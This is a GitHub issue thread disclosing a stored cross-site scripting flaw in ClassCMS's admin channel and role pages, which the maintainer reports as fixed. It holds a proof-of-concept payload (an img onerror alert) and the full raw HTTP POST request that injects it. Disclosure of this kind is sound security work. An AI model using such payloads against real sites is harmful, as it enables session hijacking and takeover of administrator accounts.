### ISSUE TITLE
There is a cross site scripting vulnerability exists in all version of ClassCMS

### ISSUE THREAD

**Issue by sma11new** [ClassCMS/ClassCMS#1]
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in all version of ClassCMS. The reason for this vulnerability is that the submitted data is not verified and filtered in the "/admin/?do=admin:channel:addPost" page, resulting in the input parameter channelname in the "/admin?do=admin:channel:del" method When executed, it will be parsed by the pop-up prompt box, and the inserted js code will be executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/ClassCMS
https://classcms.com

[Affected Product Code Base]
all version

[Attack Type]
Remote

[Impact Code execution]
True

[Vulnerability proof]
1. Add a new channel, insert the js code at the channelname: xss<img src onerror=alert(1)>

```
POST /admin/?do=admin:channel:addPost HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.11.102/admin/?do=admin:channel:add&classhash=template
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://192.168.11.102
Connection: close
Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; PHPSESSID=830hh7d5h4p713qbh11um88ru4; token_49dccd=55a79779b632cc3a1a25d700730dde4f; csrf_49dccd=0b478b68

classhash=template&channelname=xss%3Cimg+src+onerror%3Dalert(1)%3E&fid=&modulehash=&channelorder=30&enabled=on&csrf=0b478b68
```

![image_2023-05-17_16-15-36](https://github.com/ClassCMS/ClassCMS/assets/53944964/6234c715-6719-446c-8e62-e6d15982e789)

2. Enter the channel management, click to delete the channel just added, and the js code can be parsed and executed in the pop-up prompt box

![image_2023-05-17_16-16-29](https://github.com/ClassCMS/ClassCMS/assets/53944964/caa7cf21-0e4b-4efd-a84d-9f5dc154fedc)

**Comment by linjiangxiao** [comment]
thanks, fixed

**Comment by sma11new** [comment]
You're welcome, the same vulnerability exists in "User Management - Role", you can fix it together

![1](https://github.com/ClassCMS/ClassCMS/assets/53944964/f0073617-b6c6-44b7-b1d8-506555d4df96)

**Comment by linjiangxiao** [comment]
This has also been fixed
